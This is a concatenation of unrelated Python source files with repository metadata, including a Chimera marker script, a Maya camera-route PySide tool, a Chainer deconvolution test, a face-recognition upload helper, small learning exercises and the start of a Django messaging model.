mark=s.place_marker((462.224, 434.924, 475.577), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((448.243, 458.591, 466.048), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((437.243, 485.791, 466.61), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((430.227, 512.278, 477.82), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((422.915, 537.125, 492.732), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((411.371, 558.496, 510.701), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((478.264, 339.255, 627.619), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((322.506, 787.84, 421.064), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((401.17, 560.276, 479.165), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((401.17, 560.276, 479.165), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((377.925, 556.285, 495.847), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((354.179, 542.323, 505.004), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((330.77, 534.242, 489.633), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((298.217, 618.506, 574.727), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((356.832, 450.051, 399.963), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((333.861, 595.647, 541.972), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((333.53, 595.611, 542.117), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((347.203, 573.288, 551.924), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((373.003, 563.148, 546.579), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((396.472, 548.671, 539.74), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((418.065, 547.744, 558.428), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((430.679, 559.732, 581.076), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((430.672, 576.388, 604.19), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((431.783, 615.262, 527.931), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((425.852, 536.885, 682.177), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((402.265, 622.66, 493.199), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((381.581, 606.601, 494.963), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((336.68, 571.248, 501.323), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((292.39, 534.995, 507.699), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((253.962, 602.149, 531.025), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((261.609, 435.337, 499.567), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((414.473, 508.881, 510.245), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((394.44, 529.132, 510.565), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((391.599, 527.856, 482.275), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((388.902, 537.14, 455.443), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((368.05, 550.755, 441.85), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((343.154, 562.174, 434.26), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((356.516, 603.72, 502.695), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((325.684, 522.843, 364.971), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
b70144b62bd5c217a8e2b1f03e36a1c6efffae61 | a1b21aa9b4c3b99b9b16fd47686bcc76e6fafd18 | /file_and_exceptions/json_practice/favorite_number/favorite_number_writer.py | 3fc63f2e0de4fe8ce4be781f231ee1e33662a89b | [] | no_license | irfan87/python_tutorial | 986c5dae98a5ad928c3820bf0355f544c091caf0 | 71bbf8b8aba2d5a1fafc56b8cb15d471c428a0cf | refs/heads/master | 2020-06-05T00:52:07.619489 | 2019-08-19T02:56:41 | 2019-08-19T02:56:41 | 192,257,432 | 0 | 0 | null | 2019-08-19T02:56:42 | 2019-06-17T01:53:46 | Python | UTF-8 | Python | false | false | 562 | py | import os
import json
file_name = os.path.abspath('file_and_exceptions/json_practice/favorite_number/fav_number.json')
try:
# load the json file
with open(file_name) as json_file:
json_content = json.load(json_file)
except FileNotFoundError:
user_prompt = input("Please enter your favorite number: ")
# write the file
with open(file_name, 'w') as json_file:
json.dump(user_prompt, json_file)
print("To view the your favorite number, please run this app again.")
else:
print("Your favorite number is:", json_content) | [
"nerve2009@yahoo.com"
] | nerve2009@yahoo.com |
1118c8d3e5916329ace94860afc9e49ca5ba44b5 | b521802cca8e4ee4ff5a5ffe59175a34f2f6d763 | /maya/maya-utils/Scripts/Animation/2019-2-15 Tim Cam_Route_Manager/.history/Cam_Main/Cam_Main/Cam_Main_20190119164337.py | b7c7b6c65137050e80d0869f13162fb06f8dbb2a | [] | no_license | all-in-one-of/I-Do-library | 2edf68b29558728ce53fe17168694ad0353a076e | 8972ebdcf1430ccc207028d8482210092acf02ce | refs/heads/master | 2021-01-04T06:58:57.871216 | 2019-12-16T04:52:20 | 2019-12-16T04:52:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,519 | py | # -*- coding:utf-8 -*-
# Require Header
import os
import json
from functools import partial
# Sys Header
import sys
import traceback
import subprocess
# Maya Header
import maya.cmds as cmds
import maya.mel as mel
import maya.OpenMayaUI as omui
import plugin.Qt as Qt
from Qt.QtCore import *
from Qt.QtGui import *
from Qt.QtWidgets import *
def loadUiType(uiFile):
import plugin.Qt as Qt
if Qt.__binding__.startswith('PyQt'):
from Qt import _uic as uic
return uic.loadUiType(uiFile)
elif Qt.__binding__ == 'PySide':
import pysideuic as uic
else:
import pyside2uic as uic
import xml.etree.ElementTree as xml
from cStringIO import StringIO
parsed = xml.parse(uiFile)
widget_class = parsed.find('widget').get('class')
form_class = parsed.find('class').text
with open(uiFile, 'r') as f:
o = StringIO()
frame = {}
uic.compileUi(f, o, indent=0)
pyc = compile(o.getvalue(), '<string>', 'exec')
exec pyc in frame
# Fetch the base_class and form class based on their type
# in the xml from designer
form_class = frame['Ui_%s'%form_class]
base_class = eval('%s'%widget_class)
return form_class, base_class
from Qt.QtCompat import wrapInstance
DIR = os.path.dirname(__file__)
UI_PATH = os.path.join(DIR,"ui","Cam_Main.ui")
GUI_STATE_PATH = os.path.join(DIR, "json" ,'GUI_STATE.json')
form_class , base_class = loadUiType(UI_PATH)
import Cam_Item_Layout
import Cam_Attribute_Panel
reload(Cam_Item_Layout)
reload(Cam_Attribute_Panel)
from Cam_Item_Layout import Cam_Item_Layout
from Cam_Attribute_Panel import Cam_Attribute_Panel
class Cam_Main(form_class,base_class):
def __init__(self):
super(Cam_Main,self).__init__()
self.setupUi(self)
self.Cam_Item_Widget = Cam_Item_Layout(self)
self.Cam_Attribute_Widget = Cam_Attribute_Panel(self)
splitter = QSplitter()
splitter.setHandleWidth(5)
splitter.addWidget(self.Cam_Item_Widget)
splitter.addWidget(self.Cam_Attribute_Widget)
self.Main_Layout.layout().addWidget(splitter)
self.Cam_Item_Widget.mousePressEvent = self.Cam_Item_Pressing_Event
self.Default_Attr_Setting()
def Default_Attr_Setting(self):
self.Cam_Attribute_Widget.Cam_Name_Label.setText(u"<center> - 请选择镜头 - </center>")
self.Cam_Attribute_Widget.Cam_Input_Toggle.setVisible(False)
self.Cam_Attribute_Widget.Cam_Input_Layout.setVisible(False)
self.Cam_Attribute_Widget.Cam_Output_Toggle.setVisible(False)
self.Cam_Attribute_Widget.Cam_Output_Layout.setVisible(False)
def Cam_Item_Pressing_Event(self,e):
"""
mousePressEvent
# Note 点击事件触发
"""
## Note 清空所有颜色轮廓
for i,child in enumerate(self.Cam_Item_Widget.Item_Layout.children()):
if i != 0:
if child.Cam_Item.styleSheet() != "":
child.Cam_Item.setStyleSheet("")
self.Cam_Item_Widget.setStyleSheet("")
## Note 坐标偏移
offset = 90-self.Cam_Item_Widget.Scroll_Offset
for i,child in enumerate(self.Cam_Item_Widget.Item_Layout.children()):
if i != 0:
## Note 如果坐标匹配则载入相关数据
if child.geometry().contains(e.pos().x(),e.pos().y()-offset):
child.Cam_Item.setStyleSheet("#Cam_Item{border:3px solid red}" )
CamName = child.Cam_LE.text()
self.Cam_Attribute_Widget.Cam_Input_Toggle.setVisible(True)
self.Cam_Attribute_Widget.Cam_Input_Layout.setVisible(True)
self.Cam_Attribute_Widget.Cam_Output_Toggle.setVisible(True)
self.Cam_Attribute_Widget.Cam_Output_Layout.setVisible(True)
self.Cam_Attribute_Widget.Add_CamGrp_Layout.setVisible(True)
self.Cam_Attribute_Widget.Strat_Time_Layout.setVisible(True)
self.Cam_Attribute_Widget.End_Time_Layout.setVisible(True)
self.Cam_Attribute_Widget.Auto_Catch_Label.setVisible(True)
self.Cam_Attribute_Widget.Add_Loc_Layout.setVisible(True)
self.Cam_Attribute_Widget.Current_Item = child
if os.path.exists(GUI_STATE_PATH):
GUI_STATE = {}
with open(GUI_STATE_PATH,'r') as f:
GUI_STATE = json.load(f)
Attr = GUI_STATE['Cam_Item'][CamName]["Attr"]
# Note 检查选择
if self.Cam_Attribute_Widget.Check_Selection() and Attr["Add_CamGrp_LE"] != "":
self.Cam_Attribute_Widget.Cam_Name_Label.setText(u"<center> - %s - </center>" % CamName)
self.Cam_Attribute_Widget.Strat_Time_SB.setValue(int(Attr["Strat_Time_SB"]))
self.Cam_Attribute_Widget.End_Time_SB.setValue(int(Attr["End_Time_SB"]))
currentSelect = cmds.ls(sl=1)
cmds.select(Attr["Add_CamGrp_LE"])
self.Cam_Attribute_Widget.Add_CamGrp_Pick_Fun()
cmds.select(currentSelect)
else:
self.Cam_Attribute_Widget.Strat_Time_SB.setValue(0)
self.Cam_Attribute_Widget.End_Time_SB.setValue(0)
self.Cam_Attribute_Widget.Add_CamGrp_Pick_Fun()
self.Cam_Attribute_Widget.Add_Motion_Path_Pick_Fun()
self.Cam_Attribute_Widget.Add_Crv_Pick_Fun()
# self.Cam_Attribute_Widget.Add_CamGrp_LE.setText("")
# self.Cam_Attribute_Widget.Add_Loc_LE.setText("")
# self.Cam_Attribute_Widget.Add_Crv_LE.setText("")
# self.Cam_Attribute_Widget.Add_Motion_Path_LE.setText("")
self.Save_Json_Fun()
else:
QMessageBox.warning(self, u"Warning", u"加载参数失败")
break
else:
## Note 遍历全部对象说明没有匹配 使用默认情况
if self.Cam_Item_Widget.Cam_Base_Label.geometry().contains(e.pos().x(),e.pos().y()-40):
self.Cam_Item_Widget.setStyleSheet("#Cam_Base_Layout{border:3px solid red}" )
self.Cam_Attribute_Widget.Current_Item = self.Cam_Item_Widget
self.Cam_Attribute_Widget.Cam_Input_Toggle.setVisible(True)
self.Cam_Attribute_Widget.Cam_Input_Layout.setVisible(True)
self.Cam_Attribute_Widget.Cam_Output_Toggle.setVisible(False)
self.Cam_Attribute_Widget.Cam_Output_Layout.setVisible(False)
self.Cam_Attribute_Widget.Add_CamGrp_Layout.setVisible(False)
self.Cam_Attribute_Widget.Strat_Time_Layout.setVisible(False)
self.Cam_Attribute_Widget.End_Time_Layout.setVisible(False)
self.Cam_Attribute_Widget.Auto_Catch_Label.setVisible(False)
self.Cam_Attribute_Widget.Add_Loc_Layout.setVisible(False)
Cam_Base_Name = self.Cam_Item_Widget.Cam_Base_LE.text()
Attr = self.Cam_Item_Widget.Attr
# Note 检查选择
if self.Cam_Attribute_Widget.Check_Selection():
self.Cam_Attribute_Widget.Cam_Name_Label.setText(u"<center> - %s - </center>" % Cam_Base_Name)
currentSelect = cmds.ls(sl=1)
cmds.select(Attr["Add_Crv_LE"])
self.Cam_Attribute_Widget.Add_Crv_Pick_Fun()
cmds.select(currentSelect)
else:
self.Cam_Attribute_Widget.Add_Crv_LE.setText("")
self.Cam_Attribute_Widget.Add_Motion_Path_LE.setText("")
self.Save_Json_Fun()
else:
self.Default_Attr_Setting()
def Save_Json_Fun(self,path=GUI_STATE_PATH):
GUI_STATE = {}
GUI_STATE['DOCK'] = self.DOCK
GUI_STATE['Cam_Item'] = {}
GUI_STATE['Cam_Base'] = {}
for i,child in enumerate(self.Cam_Item_Widget.Item_Layout.children()):
if i != 0:
CamName = child.Cam_LE.text()
GUI_STATE['Cam_Item'][CamName] = {}
GUI_STATE['Cam_Item'][CamName]["Num"] = child.Num
GUI_STATE['Cam_Item'][CamName]["Cam"] = child.Cam_LE.text()
GUI_STATE['Cam_Item'][CamName]["Attr"] = {}
GUI_STATE['Cam_Item'][CamName]["Attr"]["Add_Loc_LE"] = child.Attr["Add_Loc_LE"]
GUI_STATE['Cam_Item'][CamName]["Attr"]["Add_Crv_LE"] = child.Attr["Add_Crv_LE"]
GUI_STATE['Cam_Item'][CamName]["Attr"]["Add_Motion_Path_LE"] = child.Attr["Add_Motion_Path_LE"]
GUI_STATE['Cam_Item'][CamName]["Attr"]["Add_CamGrp_LE"] = child.Attr["Add_CamGrp_LE"]
GUI_STATE['Cam_Item'][CamName]["Attr"]["Strat_Time_SB"] = child.Attr["Strat_Time_SB"]
GUI_STATE['Cam_Item'][CamName]["Attr"]["End_Time_SB"] = child.Attr["End_Time_SB"]
GUI_STATE['Cam_Base']["Attr"] = {}
GUI_STATE['Cam_Base']["Attr"]["Add_Crv_LE"] = self.Cam_Item_Widget.Attr["Add_Crv_LE"]
GUI_STATE['Cam_Base']["Attr"]["Add_Motion_Path_LE"] = self.Cam_Item_Widget.Attr["Add_Motion_Path_LE"]
GUI_STATE['Cam_Base']["Attr"]["Name"] = self.Cam_Item_Widget.Cam_Base_LE.text()
try:
with open(path,'w') as f:
json.dump(GUI_STATE,f,indent=4)
except:
if path != "":
QMessageBox.warning(self, u"Warning", u"保存失败")
def Load_Json_Fun(self,path=GUI_STATE_PATH,load=False):
if os.path.exists(path):
GUI_STATE = {}
with open(path,'r') as f:
GUI_STATE = json.load(f)
for CamName in GUI_STATE['Cam_Item']:
Cam = self.Cam_Item_Widget.Item_Add_Fn()
CamAttr = GUI_STATE['Cam_Item'][CamName]["Attr"]
Cam.Num = GUI_STATE['Cam_Item'][CamName]["Num"]
Cam.Attr["Add_Loc_LE"] = CamAttr["Add_Loc_LE"]
Cam.Attr["Add_Crv_LE"] = CamAttr["Add_Crv_LE"]
Cam.Attr["Add_Motion_Path_LE"] = CamAttr["Add_Motion_Path_LE"]
Cam.Attr["Add_CamGrp_LE"] = CamAttr["Add_CamGrp_LE"]
Cam.Attr["Strat_Time_SB"] = CamAttr["Strat_Time_SB"]
Cam.Attr["End_Time_SB"] = CamAttr["End_Time_SB"]
Cam.Cam_LE.setText(GUI_STATE['Cam_Item'][CamName]["Cam"])
self.Cam_Item_Widget.Attr["Add_Crv_LE"] = GUI_STATE['Cam_Base']["Attr"]["Add_Crv_LE"]
self.Cam_Item_Widget.Attr["Add_Motion_Path_LE"] = GUI_STATE['Cam_Base']["Attr"]["Add_Motion_Path_LE"]
self.Cam_Item_Widget.Cam_Base_LE.setText(GUI_STATE['Cam_Base']["Attr"]["Name"])
return True
else:
if load==True:
QMessageBox.warning(self, u"Warning", u"加载失败\n检查路径是否正确")
return False
| [
"2595715768@qq.com"
] | 2595715768@qq.com |
03f52294b6ae8c54a9f097c5e9a3df1f9bdb0115 | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/pfnet_chainer/chainer-master/tests/chainer_tests/links_tests/connection_tests/test_deconvolution_nd.py | 5ba25749e626b7c36370304d1ad40afe3db55bb1 | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 4,199 | py | import unittest
import numpy
import chainer
from chainer import cuda
from chainer import gradient_check
from chainer import initializers
from chainer.links import deconvolution_nd
from chainer import testing
from chainer.testing import attr
from chainer.testing import condition
from chainer.testing import parameterize
from chainer.utils import conv
@parameterize(*testing.product({
'dims': [(5, 4, 3), (4, 3), (3,)],
'nobias': [True, False],
'dtype': [numpy.float32],
'use_cudnn': [True, False],
'used_outsize': ['case1', 'case2', 'None'],
}) + testing.product({
'dims': [(5, 4, 3)],
'nobias': [False],
'dtype': [numpy.float16, numpy.float32, numpy.float64],
'use_cudnn': [True],
'used_outsize': ['None'],
}))
class TestDeconvolutionND(unittest.TestCase):
def setUp(self):
N = 2
in_channels = 3
out_channels = 2
ndim = len(self.dims)
ksize = (3,) * ndim
stride = (2,) * ndim
pad = (1,) * ndim
if self.used_outsize == 'case1' or self.used_outsize == 'None':
# Use output size determined with get_deconv_outsize.
outs = tuple(
conv.get_deconv_outsize(d, k, s, p)
for (d, k, s, p) in zip(self.dims, ksize, stride, pad))
elif self.used_outsize == 'case2':
# Use possible output size other than the one determined with
# get_deconv_outsize.
outs = tuple(
conv.get_deconv_outsize(d, k, s, p) + 1
for (d, k, s, p) in zip(self.dims, ksize, stride, pad))
if self.used_outsize != 'None':
outsize = outs
else:
outsize = None
if not self.nobias:
initial_bias = initializers.Uniform(scale=1, dtype=self.dtype)
else:
initial_bias = None
self.link = deconvolution_nd.DeconvolutionND(
ndim, in_channels, out_channels, ksize, stride=stride, pad=pad,
outsize=outsize, initial_bias=initial_bias)
self.link.cleargrads()
x_shape = (N, in_channels) + self.dims
self.x = numpy.random.uniform(-1, 1, x_shape).astype(self.dtype)
gy_shape = (N, out_channels) + outs
self.gy = numpy.random.uniform(-1, 1, gy_shape).astype(self.dtype)
self.check_forward_options = {}
self.check_backward_options = {
'eps': 1e-2, 'atol': 1e-4, 'rtol': 1e-3}
if self.dtype == numpy.float16:
self.check_forward_options = {'atol': 5e-3, 'rtol': 5e-2}
self.check_backward_options = {
'eps': 2 ** -3, 'atol': 1e-2, 'rtol': 1e-1}
def check_forward_consistency(self, link, x_data):
x_cpu = chainer.Variable(x_data)
y_cpu = link(x_cpu)
self.assertEqual(y_cpu.data.dtype, x_data.dtype)
link.to_gpu()
x_gpu = chainer.Variable(cuda.to_gpu(x_data))
y_gpu = link(x_gpu)
self.assertEqual(y_gpu.data.dtype, x_data.dtype)
testing.assert_allclose(
y_cpu.data, y_gpu.data, **self.check_forward_options)
@attr.gpu
@condition.retry(3)
def test_forward_consistency(self):
self.link.use_cudnn = self.use_cudnn
self.check_forward_consistency(self.link, self.x)
def check_backward(self, link, x_data, y_grad):
params = [link.W]
if not self.nobias:
params.append(link.b)
gradient_check.check_backward(
link, x_data, y_grad, params, **self.check_backward_options)
@condition.retry(3)
def test_backward_cpu(self):
self.check_backward(self.link, self.x, self.gy)
@attr.gpu
@condition.retry(3)
def test_backward_gpu(self):
self.link.use_cudnn = self.use_cudnn
self.link.to_gpu()
self.check_backward(
self.link, cuda.to_gpu(self.x), cuda.to_gpu(self.gy))
class TestDeconvolutionNDNoInitialBias(unittest.TestCase):
def test_no_initial_bias(self):
ndim = 3
ksize = 3
link = deconvolution_nd.DeconvolutionND(
ndim, 3, 2, ksize, initial_bias=None)
self.assertIsNone(link.b)
testing.run_module(__name__, __file__)
| [
"659338505@qq.com"
] | 659338505@qq.com |
f4b7c388edf75b83c3b1a73d48fcbd7b0f0cb3be | e25c3d29713a508ba2f4b76f6416b8f260429723 | /utils.py | 8c8e245b8f132c77a6e6ff940c97de33870d6e4e | [] | no_license | EaseCloud/face-api | 7c22219a8cdf65b408a369cfba6ac2930462889b | 0fff8ab7d74f1b0c669ca1bac8efbc01f13867be | refs/heads/master | 2020-03-10T10:13:46.774712 | 2018-04-17T03:29:25 | 2018-04-17T03:29:25 | 129,328,632 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,756 | py | import json
import os
import pickle
import sys
import face_recognition
from bottle import Response
import config
def read_data(group_id):
""" Read the face encodings of a specific group from the repository.
:param group_id:
:return:
"""
path = os.path.join(config.DIR_DATA, group_id)
os.makedirs(os.path.dirname(path), exist_ok=True)
if not os.path.exists(path):
pickle.dump({}, open(path, 'wb'))
return pickle.load(open(path, 'rb'))
def write_data(group_id, face_id, face):
""" Write a face to a group repository.
:param group_id:
:param face_id:
:param face:
:return:
"""
data = read_data(group_id)
data[face_id] = face
path = os.path.join(config.DIR_DATA, group_id)
pickle.dump(data, open(path, 'wb'))
def make_response(msg='', ok=True, data=None):
print('[{}] {}'.format('Success' if ok else 'Fail', msg), file=sys.stderr)
payload = dict(ok=ok, msg=msg)
if data:
print(data, file=sys.stderr)
payload['data'] = data
return Response(
json.dumps(payload),
status=200 if ok else 400,
headers={'Content-Type': 'application/json'},
)
def upload(group_id, face_id, path):
# Parse the faces from the uploaded file
image = face_recognition.load_image_file(path)
faces = face_recognition.api.face_encodings(image, num_jitters=config.JITTERS)
if len(faces) == 0:
return make_response('No face detected.', False)
elif len(faces) > 1:
return make_response('More than one face detected.', False)
write_data(group_id, face_id, faces[0])
return make_response('Upload success: group_id={} face_id={}'.format(group_id, face_id))
def recognize(group_id, path, keys=None):
names = []
faces = []
for key, value in read_data(group_id).items():
if not keys or key in keys:
names.append(key)
faces.append(value)
# Parse the faces in the uploaded image
image = face_recognition.load_image_file(path)
matches = set()
upload_faces = face_recognition.api.face_encodings(image, num_jitters=config.JITTERS)
print('{} faces detected in the picture'.format(len(upload_faces)), file=sys.stderr)
if len(upload_faces) > 4:
return make_response('Too many faces in the picture', False)
# Recognize the faces
for face in upload_faces:
results = face_recognition.compare_faces(faces, face, config.TOLERANCE)
for name, success in zip(names, results):
if success:
matches.add(name)
# Response
if matches:
return make_response('Matched {} faces.'.format(len(matches)), data=list(matches))
else:
return make_response('No matches.', False)
| [
"57082212@qq.com"
] | 57082212@qq.com |
d82167ca61a739e2d8c6919137e144a987ee22a3 | 70922de165319283d640821fd42ea1806da402c0 | /math/0x00-linear_algebra/8-ridin_bareback.py | 99e94b246997a78ccbb5d33ce5396ebf2ac47d12 | [] | no_license | ikki2530/holbertonschool-machine_learning | bdd8152d575a99281e2cce105cf87442ec07f2fb | 0b56aa0e92d65d4a5832cc994769834fbcfbe0ac | refs/heads/main | 2023-07-07T00:49:03.675328 | 2021-08-11T10:27:56 | 2021-08-11T10:27:56 | 317,352,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | #!/usr/bin/env python3
"""multiply 2 matrices"""
def matrix_shape(matrix):
"""
matrix: matrix to calcuted the shape
Return: A list with the matrix shape [n, m],
n is the number of rows and m number of columns
"""
lista = []
if type(matrix) == list:
dm = len(matrix)
lista.append(dm)
lista = lista + matrix_shape(matrix[0])
return lista
else:
return lista
def mat_mul(mat1, mat2):
"""
Description: performs matrix multiplication, 2D matrices
Returns: a new matrix with the results of the multiplication
if it is possible, None otherwise
"""
shape1 = matrix_shape(mat1)
shape2 = matrix_shape(mat2)
suma = 0
resultado = []
temp = []
if shape1[1] == shape2[0]:
for k in range(len(mat1)):
for i in range(len(mat2[0])):
for j in range(len(mat1[0])):
suma += mat1[k][j] * mat2[j][i]
temp.append(suma)
suma = 0
resultado.append(temp)
temp = []
return resultado
else:
return None
| [
"dagomez2530@gmail.com"
] | dagomez2530@gmail.com |
55bf4b302ed6ffdbe5175081e2ee071bd0c2e622 | 39d9ba65172cb170eab158ce732748f36eb5da02 | /dquora/messager/models.py | d9dddae4e288e02133b0cca5084d77be7ed5fc3a | [
"MIT"
] | permissive | adivxkk/Dquora | c3fec218922c33caebdf45211e63fa88e9e83f8b | 8e9f910eaab9fd109286572fd65b0918d93f83b9 | refs/heads/main | 2023-07-16T20:40:52.156804 | 2021-08-21T11:12:24 | 2021-08-21T11:12:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,635 | py | import uuid
from django.db import models
from django.contrib.auth import get_user_model
from django.conf import settings
class MessageQuerySet(models.query.QuerySet):
"""自定义Message的QuerySet API"""
def get_conversation(self, sender, recipient):
"""用户间的私信会话"""
qs_one = self.filter(sender=sender, recipient=recipient) # A发送给B的消息
qs_two = self.filter(sender=recipient, recipient=sender) # B发送给A的消息
